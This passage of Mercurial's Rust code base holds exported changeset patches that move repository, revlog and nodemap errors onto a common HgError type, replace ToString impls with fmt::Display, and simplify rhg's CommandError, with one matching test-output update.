Result<Vec<String>, HgError> { + if let Some(bytes) = repo + .hg_vfs() + .read("requires") + .for_file("requires".as_ref()) + .io_not_found_as_none()? + { + parse(&bytes) + } else { // Treat a missing file the same as an empty file. // From `mercurial/localrepo.py`: // > requires file contains a newline-delimited list of @@ -44,18 +37,19 @@ // > the repository. This file was introduced in Mercurial 0.9.2, // > which means very old repositories may not have one. We assume // > a missing file translates to no requirements. - Err(error) if error.kind() == std::io::ErrorKind::NotFound => { - Ok(Vec::new()) - } - - Err(error) => Err(RequirementsError::Io(error))?, + Ok(Vec::new()) } } -pub fn check(repo: &Repo) -> Result<(), RequirementsError> { +pub fn check(repo: &Repo) -> Result<(), HgError> { for feature in load(repo)? { if !SUPPORTED.contains(&&*feature) { - return Err(RequirementsError::Unsupported { feature }); + // TODO: collect and all unknown features and include them in the + // error message? + return Err(HgError::UnsupportedFeature(format!( + "repository requires feature unknown to this Mercurial: {}", + feature + ))); } } Ok(()) diff --git a/rust/rhg/src/error.rs b/rust/rhg/src/error.rs --- a/rust/rhg/src/error.rs +++ b/rust/rhg/src/error.rs @@ -4,7 +4,6 @@ use format_bytes::format_bytes; use hg::errors::HgError; use hg::operations::FindRootError; -use hg::requirements::RequirementsError; use hg::revlog::revlog::RevlogError; use hg::utils::files::get_bytes_from_path; use std::convert::From; @@ -17,9 +16,6 @@ RootNotFound(PathBuf), /// The current directory cannot be found CurrentDirNotFound(std::io::Error), - /// `.hg/requires` - #[from] - RequirementsError(RequirementsError), /// The standard output stream cannot be written to StdoutError, /// The standard error stream cannot be written to @@ -38,10 +34,6 @@ match self { CommandError::RootNotFound(_) => exitcode::ABORT, CommandError::CurrentDirNotFound(_) => exitcode::ABORT, - CommandError::RequirementsError( - RequirementsError::Unsupported { .. }, - ) => exitcode::UNIMPLEMENTED_COMMAND, - CommandError::RequirementsError(_) => exitcode::ABORT, CommandError::StdoutError => exitcode::ABORT, CommandError::StderrError => exitcode::ABORT, CommandError::Abort(_) => exitcode::ABORT, @@ -67,15 +59,9 @@ b"abort: error getting current working directory: {}\n", e.to_string().as_bytes(), )), - CommandError::RequirementsError(RequirementsError::Corrupted) => { - Some( - "abort: .hg/requires is corrupted\n".as_bytes().to_owned(), - ) - } CommandError::Abort(message) => message.to_owned(), - CommandError::RequirementsError(_) - | CommandError::StdoutError + CommandError::StdoutError | CommandError::StderrError | CommandError::Unimplemented | CommandError::Other(HgError::UnsupportedFeature(_)) => None, diff --git a/tests/test-rhg.t b/tests/test-rhg.t --- a/tests/test-rhg.t +++ b/tests/test-rhg.t @@ -163,7 +163,7 @@ $ echo -e '\xFF' >> .hg/requires $ rhg debugrequirements - abort: .hg/requires is corrupted + corrupted repository: parse error in 'requires' file [255] Persistent nodemap # HG changeset patch # User Simon Sapin <simon.sapin@octobus.net> # Date 1611755125 -3600 # Wed Jan 27 14:45:25 2021 +0100 # Node ID 43d63979a75e860069382a100a74f47f7647d87a # Parent 02d3bb972121437c19b53a83cc9360bb3f2b725f rust: use HgError in RevlogError and Vfs Differential Revision: https://phab.mercurial-scm.org/D9897 diff --git a/rust/hg-core/src/errors.rs b/rust/hg-core/src/errors.rs --- a/rust/hg-core/src/errors.rs +++ b/rust/hg-core/src/errors.rs @@ -35,6 +35,9 @@ impl HgError { pub fn corrupted(explanation: impl Into<String>) -> Self { + // TODO: capture a backtrace here and keep it in the error value + // to aid debugging? + // https://doc.rust-lang.org/std/backtrace/struct.Backtrace.html HgError::CorruptedRepository(explanation.into()) } } diff --git a/rust/hg-core/src/lib.rs b/rust/hg-core/src/lib.rs --- a/rust/hg-core/src/lib.rs +++ b/rust/hg-core/src/lib.rs @@ -3,6 +3,7 @@ // // This software may be used and distributed according to the terms of the // GNU General Public License version 2 or any later version. + mod ancestors; pub mod dagops; pub mod errors; diff --git a/rust/hg-core/src/operations/cat.rs b/rust/hg-core/src/operations/cat.rs --- a/rust/hg-core/src/operations/cat.rs +++ b/rust/hg-core/src/operations/cat.rs @@ -33,8 +33,8 @@ let changelog = Changelog::open(repo)?; let manifest = Manifest::open(repo)?; let changelog_entry = changelog.get_rev(rev)?; - let manifest_node = Node::from_hex(&changelog_entry.manifest_node()?) - .map_err(|_| RevlogError::Corrupted)?; + let manifest_node = + Node::from_hex_for_repo(&changelog_entry.manifest_node()?)?; let manifest_entry = manifest.get_node(manifest_node.into())?; let mut bytes = vec![]; @@ -46,8 +46,7 @@ let file_log = Revlog::open(repo, &index_path, Some(&data_path))?; - let file_node = Node::from_hex(node_bytes) - .map_err(|_| RevlogError::Corrupted)?; + let file_node = Node::from_hex_for_repo(node_bytes)?; let file_rev = file_log.get_node_rev(file_node.into())?; let data = file_log.get_rev_data(file_rev)?; if data.starts_with(&METADATA_DELIMITER) { diff --git a/rust/hg-core/src/operations/list_tracked_files.rs b/rust/hg-core/src/operations/list_tracked_files.rs --- a/rust/hg-core/src/operations/list_tracked_files.rs +++ b/rust/hg-core/src/operations/list_tracked_files.rs @@ -6,7 +6,7 @@ // GNU General Public License version 2 or any later version. use crate::dirstate::parsers::parse_dirstate; -use crate::errors::{HgError, IoResultExt}; +use crate::errors::HgError; use crate::repo::Repo; use crate::revlog::changelog::Changelog; use crate::revlog::manifest::{Manifest, ManifestEntry}; @@ -25,12 +25,7 @@ impl Dirstate { pub fn new(repo: &Repo) -> Result<Self, HgError> { - let content = repo - .hg_vfs() - .read("dirstate") - // TODO: this will be more accurate when we use `HgError` in - // `Vfs::read`. - .for_file("dirstate".as_ref())?; + let content = repo.hg_vfs().read("dirstate")?; Ok(Self { content }) } @@ -57,8 +52,8 @@ let changelog = Changelog::open(repo)?; let manifest = Manifest::open(repo)?; let changelog_entry = changelog.get_rev(rev)?; - let manifest_node = Node::from_hex(&changelog_entry.manifest_node()?) - .map_err(|_| RevlogError::Corrupted)?; + let manifest_node = + Node::from_hex_for_repo(&changelog_entry.manifest_node()?)?; let manifest_entry = manifest.get_node(manifest_node.into())?; Ok(FilesForRev(manifest_entry)) } diff --git a/rust/hg-core/src/repo.rs b/rust/hg-core/src/repo.rs --- a/rust/hg-core/src/repo.rs +++ b/rust/hg-core/src/repo.rs @@ -1,4 +1,4 @@ -use crate::errors::HgError; +use crate::errors::{HgError, IoResultExt}; use crate::operations::{find_root, FindRootError}; use crate::requirements; use memmap::{Mmap, MmapOptions}; @@ -68,24 +68,19 @@ pub(crate) fn read( &self, relative_path: impl AsRef<Path>, - ) -> std::io::Result<Vec<u8>> { - std::fs::read(self.base.join(relative_path)) - } - - pub(crate) fn open( - &self, - relative_path: impl AsRef<Path>, - ) -> std::io::Result<std::fs::File> { - std::fs::File::open(self.base.join(relative_path)) + ) -> Result<Vec<u8>, HgError> { + let path = self.base.join(relative_path); + std::fs::read(&path).for_file(&path) } pub(crate) fn mmap_open( &self, relative_path: impl AsRef<Path>, - ) -> std::io::Result<Mmap> { - let file = self.open(relative_path)?; + ) -> Result<Mmap, HgError> { + let path = self.base.join(relative_path); + let file = std::fs::File::open(&path).for_file(&path)?; // TODO: what are the safety requirements here? - let mmap = unsafe { MmapOptions::new().map(&file) }?; + let mmap = unsafe { MmapOptions::new().map(&file) }.for_file(&path)?; Ok(mmap) } } diff --git a/rust/hg-core/src/requirements.rs b/rust/hg-core/src/requirements.rs --- a/rust/hg-core/src/requirements.rs +++ b/rust/hg-core/src/requirements.rs @@ -1,4 +1,4 @@ -use crate::errors::{HgError, HgResultExt, IoResultExt}; +use crate::errors::{HgError, HgResultExt}; use crate::repo::Repo; fn parse(bytes: &[u8]) -> Result<Vec<String>, HgError> { @@ -22,11 +22,8 @@ } pub fn load(repo: &Repo) -> Result<Vec<String>, HgError> { - if let Some(bytes) = repo - .hg_vfs() - .read("requires") - .for_file("requires".as_ref()) - .io_not_found_as_none()? + if let Some(bytes) = + repo.hg_vfs().read("requires").io_not_found_as_none()? { parse(&bytes) } else { diff --git a/rust/hg-core/src/revlog/changelog.rs b/rust/hg-core/src/revlog/changelog.rs --- a/rust/hg-core/src/revlog/changelog.rs +++ b/rust/hg-core/src/revlog/changelog.rs @@ -1,3 +1,4 @@ +use crate::errors::HgError; use crate::repo::Repo; use crate::revlog::revlog::{Revlog, RevlogError}; use crate::revlog::NodePrefix; @@ -53,6 +54,8 @@ /// Return the node id of the `manifest` referenced by this `changelog` /// entry. pub fn manifest_node(&self) -> Result<&[u8], RevlogError> { - self.lines().next().ok_or(RevlogError::Corrupted) + self.lines() + .next() + .ok_or_else(|| HgError::corrupted("empty changelog entry").into()) } } diff --git a/rust/hg-core/src/revlog/index.rs b/rust/hg-core/src/revlog/index.rs --- a/rust/hg-core/src/revlog/index.rs +++ b/rust/hg-core/src/revlog/index.rs @@ -3,6 +3,7 @@ use byteorder::{BigEndian, ByteOrder}; +use crate::errors::HgError; use crate::revlog::node::Node; use crate::revlog::revlog::RevlogError; use crate::revlog::{Revision, NULL_REVISION}; @@ -44,7 +45,8 @@ offsets: Some(offsets), }) } else { - Err(RevlogError::Corrupted) + Err(HgError::corrupted("unexpected inline revlog length") + .into()) } } else { Ok(Self { diff --git a/rust/hg-core/src/revlog/node.rs b/rust/hg-core/src/revlog/node.rs --- a/rust/hg-core/src/revlog/node.rs +++ b/rust/hg-core/src/revlog/node.rs @@ -8,6 +8,7 @@ //! In Mercurial code base, it is customary to call "a node" the binary SHA //! of a revision. +use crate::errors::HgError; use bytes_cast::BytesCast; use std::convert::{TryFrom, TryInto}; use std::fmt; @@ -136,6 +137,19 @@ } } + /// `from_hex`, but for input from an internal file of the repository such + /// as a changelog or manifest entry. + /// + /// An error is treated as repository corruption. + pub fn from_hex_for_repo(hex: impl AsRef<[u8]>) -> Result<Node, HgError> { + Self::from_hex(hex.as_ref()).map_err(|FromHexError| { + HgError::CorruptedRepository(format!( + "Expected a full hexadecimal node ID, found {}", + String::from_utf8_lossy(hex.as_ref()) + )) + }) + } + /// Provide access to binary data /// /// This is needed by FFI layers, for instance to return expected diff --git a/rust/hg-core/src/revlog/nodemap_docket.rs b/rust/hg-core/src/revlog/nodemap_docket.rs --- a/rust/hg-core/src/revlog/nodemap_docket.rs +++ b/rust/hg-core/src/revlog/nodemap_docket.rs @@ -1,3 +1,4 @@ +use crate::errors::{HgError, HgResultExt}; use bytes_cast::{unaligned, BytesCast}; use memmap::Mmap; use std::path::{Path, PathBuf}; @@ -38,12 +39,12 @@ index_path: &Path, ) -> Result<Option<(Self, Mmap)>, RevlogError> { let docket_path = index_path.with_extension("n"); - let docket_bytes = match repo.store_vfs().read(&docket_path) { - Err(e) if e.kind() == std::io::ErrorKind::NotFound => { - return Ok(None) - } - Err(e) => return Err(RevlogError::IoError(e)), - Ok(bytes) => bytes, + let docket_bytes = if let Some(bytes) = + repo.store_vfs().read(&docket_path).io_not_found_as_none()? + { + bytes + } else { + return Ok(None); }; let input = if let Some((&ONDISK_VERSION, rest)) = @@ -54,36 +55,40 @@ return Ok(None); }; - let (header, rest) = DocketHeader::from_bytes(input)?; + /// Treat any error as a parse error + fn parse<T, E>(result: Result<T, E>) -> Result<T, RevlogError> { + result.map_err(|_| { + HgError::corrupted("nodemap docket parse error").into() + }) + } + + let (header, rest) = parse(DocketHeader::from_bytes(input))?; let uid_size = header.uid_size as usize; // TODO: do we care about overflow for 4 GB+ nodemap files on 32-bit // systems? let tip_node_size = header.tip_node_size.get() as usize; let data_length = header.data_length.get() as usize; - let (uid, rest) = u8::slice_from_bytes(rest, uid_size)?; - let (_tip_node, _rest) = u8::slice_from_bytes(rest, tip_node_size)?; - let uid = - std::str::from_utf8(uid).map_err(|_| RevlogError::Corrupted)?; + let (uid, rest) = parse(u8::slice_from_bytes(rest, uid_size))?; + let (_tip_node, _rest) = + parse(u8::slice_from_bytes(rest, tip_node_size))?; + let uid = parse(std::str::from_utf8(uid))?; let docket = NodeMapDocket { data_length }; let data_path = rawdata_path(&docket_path, uid); - // TODO: use `std::fs::read` here when the `persistent-nodemap.mmap` + // TODO: use `vfs.read()` here when the `persistent-nodemap.mmap` // config is false? - match repo.store_vfs().mmap_open(&data_path) { - Ok(mmap) => { - if mmap.len() >= data_length { - Ok(Some((docket, mmap))) - } else { - Err(RevlogError::Corrupted) - } + if let Some(mmap) = repo + .store_vfs() + .mmap_open(&data_path) + .io_not_found_as_none()? + { + if mmap.len() >= data_length { + Ok(Some((docket, mmap))) + } else { + Err(HgError::corrupted("persistent nodemap too short").into()) } - Err(error) => { - if error.kind() == std::io::ErrorKind::NotFound { - Ok(None) - } else { - Err(RevlogError::IoError(error)) - } - } + } else { + Ok(None) } } } diff --git a/rust/hg-core/src/revlog/revlog.rs b/rust/hg-core/src/revlog/revlog.rs --- a/rust/hg-core/src/revlog/revlog.rs +++ b/rust/hg-core/src/revlog/revlog.rs @@ -13,25 +13,34 @@ use super::index::Index; use super::node::{NodePrefix, NODE_BYTES_LENGTH, NULL_NODE}; use super::nodemap; -use super::nodemap::NodeMap; +use super::nodemap::{NodeMap, NodeMapError}; use super::nodemap_docket::NodeMapDocket; use super::patch; +use crate::errors::HgError; use crate::repo::Repo; use crate::revlog::Revision; +#[derive(derive_more::From)] pub enum RevlogError { - IoError(std::io::Error), - UnsuportedVersion(u16), InvalidRevision, /// Found more than one entry whose ID match the requested prefix AmbiguousPrefix, - Corrupted, - UnknowDataFormat(u8), + #[from] + Other(HgError), } -impl From<bytes_cast::FromBytesError> for RevlogError { - fn from(_: bytes_cast::FromBytesError) -> Self { - RevlogError::Corrupted +impl From<NodeMapError> for RevlogError { + fn from(error: NodeMapError) -> Self { + match error { + NodeMapError::MultipleResults => RevlogError::AmbiguousPrefix, + NodeMapError::RevisionNotInIndex(_) => RevlogError::corrupted(), + } + } +} + +impl RevlogError { + fn corrupted() -> Self { + RevlogError::Other(HgError::corrupted("corrupted revlog")) } } @@ -59,14 +68,12 @@ data_path: Option<&Path>, ) -> Result<Self, RevlogError> { let index_path = index_path.as_ref(); - let index_mmap = repo - .store_vfs() - .mmap_open(&index_path) - .map_err(RevlogError::IoError)?; + let index_mmap = repo.store_vfs().mmap_open(&index_path)?; let version = get_version(&index_mmap); if version != 1 { - return Err(RevlogError::UnsuportedVersion(version)); + // A proper new version should have had a repo/store requirement. + return Err(RevlogError::corrupted()); } let index = Index::new(Box::new(index_mmap))?; @@ -80,10 +87,7 @@ None } else { let data_path = data_path.unwrap_or(&default_data_path); - let data_mmap = repo - .store_vfs() - .mmap_open(data_path) - .map_err(RevlogError::IoError)?; + let data_mmap = repo.store_vfs().mmap_open(data_path)?; Some(Box::new(data_mmap)) }; @@ -121,9 +125,7 @@ ) -> Result<Revision, RevlogError> { if let Some(nodemap) = &self.nodemap { return nodemap - .find_bin(&self.index, node) - // TODO: propagate details of this error: - .map_err(|_| RevlogError::Corrupted)? + .find_bin(&self.index, node)? .ok_or(RevlogError::InvalidRevision); } @@ -136,7 +138,9 @@ let mut found_by_prefix = None; for rev in (0..self.len() as Revision).rev() { let index_entry = - self.index.get_entry(rev).ok_or(RevlogError::Corrupted)?; + self.index.get_entry(rev).ok_or(HgError::corrupted( + "revlog references a revision not in the index", + ))?; if node == *index_entry.hash() { return Ok(rev); } @@ -167,8 +171,9 @@ let mut delta_chain = vec![]; while let Some(base_rev) = entry.base_rev { delta_chain.push(entry); - entry = - self.get_entry(base_rev).or(Err(RevlogError::Corrupted))?; + entry = self + .get_entry(base_rev) + .map_err(|_| RevlogError::corrupted())?; } // TODO do not look twice in the index @@ -191,7 +196,7 @@ ) { Ok(data) } else { - Err(RevlogError::Corrupted) + Err(RevlogError::corrupted()) } } @@ -301,7 +306,8 @@ b'x' => Ok(Cow::Owned(self.uncompressed_zlib_data()?)), // zstd data. b'\x28' => Ok(Cow::Owned(self.uncompressed_zstd_data()?)), - format_type => Err(RevlogError::UnknowDataFormat(format_type)), + // A proper new format should have had a repo/store requirement. + _format_type => Err(RevlogError::corrupted()), } } @@ -311,13 +317,13 @@ let mut buf = Vec::with_capacity(self.compressed_len); decoder .read_to_end(&mut buf) - .or(Err(RevlogError::Corrupted))?; + .map_err(|_| RevlogError::corrupted())?; Ok(buf) } else { let mut buf = vec![0; self.uncompressed_len]; decoder .read_exact(&mut buf) - .or(Err(RevlogError::Corrupted))?; + .map_err(|_| RevlogError::corrupted())?; Ok(buf) } } @@ -326,14 +332,14 @@ if self.is_delta() { let mut buf = Vec::with_capacity(self.compressed_len); zstd::stream::copy_decode(self.bytes, &mut buf) - .or(Err(RevlogError::Corrupted))?; + .map_err(|_| RevlogError::corrupted())?; Ok(buf) } else { let mut buf = vec![0; self.uncompressed_len]; let len = zstd::block::decompress_to_buffer(self.bytes, &mut buf) - .or(Err(RevlogError::Corrupted))?; + .map_err(|_| RevlogError::corrupted())?; if len != self.uncompressed_len { - Err(RevlogError::Corrupted) + Err(RevlogError::corrupted()) } else { Ok(buf) } diff --git a/rust/rhg/src/error.rs b/rust/rhg/src/error.rs --- a/rust/rhg/src/error.rs +++ b/rust/rhg/src/error.rs @@ -103,9 +103,6 @@ impl From<(RevlogError, &str)> for CommandError { fn from((err, rev): (RevlogError, &str)) -> CommandError { match err { - RevlogError::IoError(err) => CommandError::Abort(Some( - utf8_to_local(&format!("abort: {}\n", err)).into(), - )), RevlogError::InvalidRevision => CommandError::Abort(Some( utf8_to_local(&format!( "abort: invalid revision identifier {}\n", @@ -120,27 +117,7 @@ )) .into(), )), - RevlogError::UnsuportedVersion(version) => { - CommandError::Abort(Some( - utf8_to_local(&format!( - "abort: unsupported revlog version {}\n", - version - )) - .into(), - )) - } - RevlogError::Corrupted => { - CommandError::Abort(Some("abort: corrupted revlog\n".into())) - } - RevlogError::UnknowDataFormat(format) => { - CommandError::Abort(Some( - utf8_to_local(&format!( - "abort: unknow revlog dataformat {:?}\n", - format - )) - .into(), - )) - } + RevlogError::Other(err) => CommandError::Other(err), } } } # HG changeset patch # User Simon Sapin <simon.sapin@octobus.net> # Date 1611858117 -3600 # Thu Jan 28 19:21:57 2021 +0100 # Node ID 6c778d20c8c20620b3c6e4a9da99b5088f90fe58 # Parent 43d63979a75e860069382a100a74f47f7647d87a rust: replace ToString impls with Display ToString is automatically implementing for everything that implements Display, and Display can avoid allocating intermediate strings. Differential Revision: https://phab.mercurial-scm.org/D9904 diff --git a/rust/hg-core/src/dirstate/status.rs b/rust/hg-core/src/dirstate/status.rs --- a/rust/hg-core/src/dirstate/status.rs +++ b/rust/hg-core/src/dirstate/status.rs @@ -33,6 +33,7 @@ use std::{ borrow::Cow, collections::HashSet, + fmt, fs::{read_dir, DirEntry}, io::ErrorKind, ops::Deref, @@ -51,17 +52,16 @@ Unknown, } -impl ToString for BadType { - fn to_string(&self) -> String { - match self { +impl fmt::Display for BadType { + fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result { + f.write_str(match self { BadType::CharacterDevice => "character device", BadType::BlockDevice => "block device", BadType::FIFO => "fifo", BadType::Socket => "socket", BadType::Directory => "directory", BadType::Unknown => "unknown", - } - .to_string() + }) } } @@ -277,12 +277,12 @@ pub type StatusResult<T> = Result<T, StatusError>; -impl ToString for StatusError { - fn to_string(&self) -> String { +impl fmt::Display for StatusError { + fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result { match self { - StatusError::IO(e) => e.to_string(), - StatusError::Path(e) => e.to_string(), - StatusError::Pattern(e) => e.to_string(), + StatusError::IO(error) => error.fmt(f), + StatusError::Path(error) => error.fmt(f), + StatusError::Pattern(error) => error.fmt(f), } } } diff --git a/rust/hg-core/src/lib.rs b/rust/hg-core/src/lib.rs --- a/rust/hg-core/src/lib.rs +++ b/rust/hg-core/src/lib.rs @@ -39,6 +39,7 @@ PatternFileWarning, PatternSyntax, }; use std::collections::HashMap; +use std::fmt; use twox_hash::RandomXxHashBuilder64; /// This is a contract between the `micro-timer` crate and us, to expose @@ -59,14 +60,16 @@ InvalidPath(HgPathError), } -impl ToString for DirstateMapError { - fn to_string(&self) -> String { +impl fmt::Display for DirstateMapError { + fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result { match self { DirstateMapError::PathNotFound(_) => { - "expected a value, found none".to_string() + f.write_str("expected a value, found none") } - DirstateMapError::EmptyPath => "Overflow in dirstate.".to_string(), - DirstateMapError::InvalidPath(e) => e.to_string(), + DirstateMapError::EmptyPath => { + f.write_str("Overflow in dirstate.") + } + DirstateMapError::InvalidPath(path_error) => path_error.fmt(f), } } } @@ -91,25 +94,26 @@ NonRegexPattern(IgnorePattern), } -impl ToString for PatternError { - fn to_string(&self) -> String { +impl fmt::Display for PatternError { + fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result { match self { PatternError::UnsupportedSyntax(syntax) => { - format!("Unsupported syntax {}", syntax) + write!(f, "Unsupported syntax {}", syntax) } PatternError::UnsupportedSyntaxInFile(syntax, file_path, line) => { - format!( + write!( + f, "{}:{}: unsupported syntax {}", file_path, line, syntax ) } PatternError::TooLong(size) => { - format!("matcher pattern is too long ({} bytes)", size) + write!(f, "matcher pattern is too long ({} bytes)", size) } - PatternError::IO(e) => e.to_string(), - PatternError::Path(e) => e.to_string(), + PatternError::IO(error) => error.fmt(f), + PatternError::Path(error) => error.fmt(f), PatternError::NonRegexPattern(pattern) => { - format!("'{:?}' cannot be turned into a regex", pattern) + write!(f, "'{:?}' cannot be turned into a regex", pattern) } } } diff --git a/rust/hg-core/src/utils/hg_path.rs b/rust/hg-core/src/utils/hg_path.rs --- a/rust/hg-core/src/utils/hg_path.rs +++ b/rust/hg-core/src/utils/hg_path.rs @@ -47,57 +47,68 @@ }, } -impl ToString for HgPathError { - fn to_string(&self) -> String { +impl fmt::Display for HgPathError { + fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result { match self { HgPathError::LeadingSlash(bytes) => { - format!("Invalid HgPath '{:?}': has a leading slash.", bytes) + write!(f, "Invalid HgPath '{:?}': has a leading slash.", bytes) } HgPathError::ConsecutiveSlashes { bytes, second_slash_index: pos, - } => format!( + } => write!( + f, "Invalid HgPath '{:?}': consecutive slashes at pos {}.", bytes, pos ), HgPathError::ContainsNullByte { bytes, null_byte_index: pos, - } => format!( + } => write!( + f, "Invalid HgPath '{:?}': contains null byte at pos {}.", bytes, pos ), - HgPathError::DecodeError(bytes) => { - format!("Invalid HgPath '{:?}': could not be decoded.", bytes) - } + HgPathError::DecodeError(bytes) => write!( + f, + "Invalid HgPath '{:?}': could not be decoded.", + bytes + ), HgPathError::EndsWithSlash(path) => { - format!("Audit failed for '{}': ends with a slash.", path) + write!(f, "Audit failed for '{}': ends with a slash.", path) } - HgPathError::ContainsIllegalComponent(path) => format!( + HgPathError::ContainsIllegalComponent(path) => write!( + f, "Audit failed for '{}': contains an illegal component.", path ), - HgPathError::InsideDotHg(path) => format!( + HgPathError::InsideDotHg(path) => write!( + f, "Audit failed for '{}': is inside the '.hg' folder.", path ), HgPathError::IsInsideNestedRepo { path, nested_repo: nested, - } => format!( + } => { + write!(f, "Audit failed for '{}': is inside a nested repository '{}'.", path, nested - ), - HgPathError::TraversesSymbolicLink { path, symlink } => format!( + ) + } + HgPathError::TraversesSymbolicLink { path, symlink } => write!( + f, "Audit failed for '{}': traverses symbolic link '{}'.", path, symlink ), - HgPathError::NotFsCompliant(path) => format!( + HgPathError::NotFsCompliant(path) => write!( + f, "Audit failed for '{}': cannot be turned into a \ filesystem path.", path ), - HgPathError::NotUnderRoot { path, root } => format!( + HgPathError::NotUnderRoot { path, root } => write!( + f, "Audit failed for '{}': not under root {}.", path.display(), root.display() # HG changeset patch # User Simon Sapin <simon.sapin@octobus.net> # Date 1611857635 -3600 # Thu Jan 28 19:13:55 2021 +0100 # Node ID ca3f73cc3cf4269ae519878628cba51a70065fa5 # Parent 6c778d20c8c20620b3c6e4a9da99b5088f90fe58 rhg: Simplify CommandError based on its use Differential Revision: https://phab.mercurial-scm.org/D9905 diff --git a/rust/hg-core/src/utils.rs b/rust/hg-core/src/utils.rs --- a/rust/hg-core/src/utils.rs +++ b/rust/hg-core/src/utils.rs @@ -7,6 +7,7 @@ //! Contains useful functions, traits, structs, etc. for use in core. +use crate::errors::{HgError, IoErrorContext}; use crate::utils::hg_path::HgPath; use std::{io::Write, ops::Deref}; @@ -176,3 +177,10 @@ None } } + +pub fn current_dir() -> Result<std::path::PathBuf, HgError> { + std::env::current_dir().map_err(|error| HgError::IoError { + error, + context: IoErrorContext::CurrentDir, + }) +} diff --git a/rust/rhg/src/commands/cat.rs b/rust/rhg/src/commands/cat.rs --- a/rust/rhg/src/commands/cat.rs +++ b/rust/rhg/src/commands/cat.rs @@ -32,17 +32,18 @@ fn run(&self, ui: &Ui) -> Result<(), CommandError> { let repo = Repo::find()?; repo.check_requirements()?; - let cwd = std::env::current_dir() - .or_else(|e| Err(CommandError::CurrentDirNotFound(e)))?; + let cwd = hg::utils::current_dir()?; let mut files = vec![]; for file in self.files.iter() { + // TODO: actually normalize `..` path segments etc? let normalized = cwd.join(&file); let stripped = normalized .strip_prefix(&repo.working_directory_path()) - .or(Err(CommandError::Abort(None)))?; + // TODO: error message for path arguments outside of the repo + .map_err(|_| CommandError::abort(""))?; let hg_file = HgPathBuf::try_from(stripped.to_path_buf()) - .or(Err(CommandError::Abort(None)))?; + .map_err(|e| CommandError::abort(e.to_string()))?; files.push(hg_file); } diff --git a/rust/rhg/src/commands/files.rs b/rust/rhg/src/commands/files.rs --- a/rust/rhg/src/commands/files.rs +++ b/rust/rhg/src/commands/files.rs @@ -28,8 +28,7 @@ repo: &Repo, files: impl IntoIterator<Item = &'a HgPath>, ) -> Result<(), CommandError> { - let cwd = std::env::current_dir() - .or_else(|e| Err(CommandError::CurrentDirNotFound(e)))?; + let cwd = hg::utils::current_dir()?; let rooted_cwd = cwd .strip_prefix(repo.working_directory_path()) .expect("cwd was already checked within the repository"); diff --git a/rust/rhg/src/error.rs b/rust/rhg/src/error.rs --- a/rust/rhg/src/error.rs +++ b/rust/rhg/src/error.rs @@ -1,101 +1,65 @@ -use crate::exitcode; use crate::ui::utf8_to_local; use crate::ui::UiError; -use format_bytes::format_bytes; -use hg::errors::HgError; +use hg::errors::{HgError, IoErrorContext}; use hg::operations::FindRootError; use hg::revlog::revlog::RevlogError; -use hg::utils::files::get_bytes_from_path; use std::convert::From; -use std::path::PathBuf; /// The kind of command error -#[derive(Debug, derive_more::From)] +#[derive(Debug)] pub enum CommandError { - /// The root of the repository cannot be found - RootNotFound(PathBuf), - /// The current directory cannot be found - CurrentDirNotFound(std::io::Error), - /// The standard output stream cannot be written to - StdoutError, - /// The standard error stream cannot be written to - StderrError, - /// The command aborted - Abort(Option<Vec<u8>>), + /// Exit with an error message and "standard" failure exit code. + Abort { message: Vec<u8> }, + /// A mercurial capability as not been implemented. + /// + /// There is no error message printed in this case. + /// Instead, we exit with a specic status code and a wrapper script may + /// fallback to Python-based Mercurial. Unimplemented, - /// Common cases - #[from] - Other(HgError), } impl CommandError { - pub fn get_exit_code(&self) -> exitcode::ExitCode { - match self { - CommandError::RootNotFound(_) => exitcode::ABORT, - CommandError::CurrentDirNotFound(_) => exitcode::ABORT, - CommandError::StdoutError => exitcode::ABORT, - CommandError::StderrError => exitcode::ABORT, - CommandError::Abort(_) => exitcode::ABORT, - CommandError::Unimplemented => exitcode::UNIMPLEMENTED_COMMAND, - CommandError::Other(HgError::UnsupportedFeature(_)) => { - exitcode::UNIMPLEMENTED_COMMAND - } - CommandError::Other(_) => exitcode::ABORT, + pub fn abort(message: impl AsRef<str>) -> Self { + CommandError::Abort { + // TODO: bytes-based (instead of Unicode-based) formatting + // of error messages to handle non-UTF-8 filenames etc: + // https://www.mercurial-scm.org/wiki/EncodingStrategy#Mixing_output + message: utf8_to_local(message.as_ref()).into(), } } +} - /// Return the message corresponding to the error if any - pub fn get_error_message_bytes(&self) -> Option<Vec<u8>> { - match self { - CommandError::RootNotFound(path) => { - let bytes = get_bytes_from_path(path); - Some(format_bytes!( - b"abort: no repository found in '{}' (.hg not found)!\n", - bytes.as_slice() - )) - } - CommandError::CurrentDirNotFound(e) => Some(format_bytes!( - b"abort: error getting current working directory: {}\n", - e.to_string().as_bytes(), - )), - CommandError::Abort(message) => message.to_owned(), - - CommandError::StdoutError - | CommandError::StderrError - | CommandError::Unimplemented - | CommandError::Other(HgError::UnsupportedFeature(_)) => None, - - CommandError::Other(e) => { - Some(format_bytes!(b"{}\n", e.to_string().as_bytes())) - } +impl From<HgError> for CommandError { + fn from(error: HgError) -> Self { + match error { + HgError::UnsupportedFeature(_) => CommandError::Unimplemented, + _ => CommandError::abort(error.to_string()), } } - - /// Exist the process with the corresponding exit code. - pub fn exit(&self) { - std::process::exit(self.get_exit_code()) - } } impl From<UiError> for CommandError { - fn from(error: UiError) -> Self { - match error { - UiError::StdoutError(_) => CommandError::StdoutError, - UiError::StderrError(_) => CommandError::StderrError, - } + fn from(_error: UiError) -> Self { + // If we already failed writing to stdout or stderr, + // writing an error message to stderr about it would be likely to fail + // too. + CommandError::abort("") } } impl From<FindRootError> for CommandError { fn from(err: FindRootError) -> Self { match err { - FindRootError::RootNotFound(path) => { - CommandError::RootNotFound(path) + FindRootError::RootNotFound(path) => CommandError::abort(format!( + "no repository found in '{}' (.hg not found)!", + path.display() + )), + FindRootError::GetCurrentDirError(error) => HgError::IoError { + error, + context: IoErrorContext::CurrentDir, } - FindRootError::GetCurrentDirError(e) => { - CommandError::CurrentDirNotFound(e) - } + .into(), } } } @@ -103,21 +67,15 @@ impl From<(RevlogError, &str)> for CommandError { fn from((err, rev): (RevlogError, &str)) -> CommandError { match err { - RevlogError::InvalidRevision => CommandError::Abort(Some( - utf8_to_local(&format!( - "abort: invalid revision identifier {}\n", - rev - )) - .into(), + RevlogError::InvalidRevision => CommandError::abort(format!( + "invalid revision identifier {}", + rev )), - RevlogError::AmbiguousPrefix 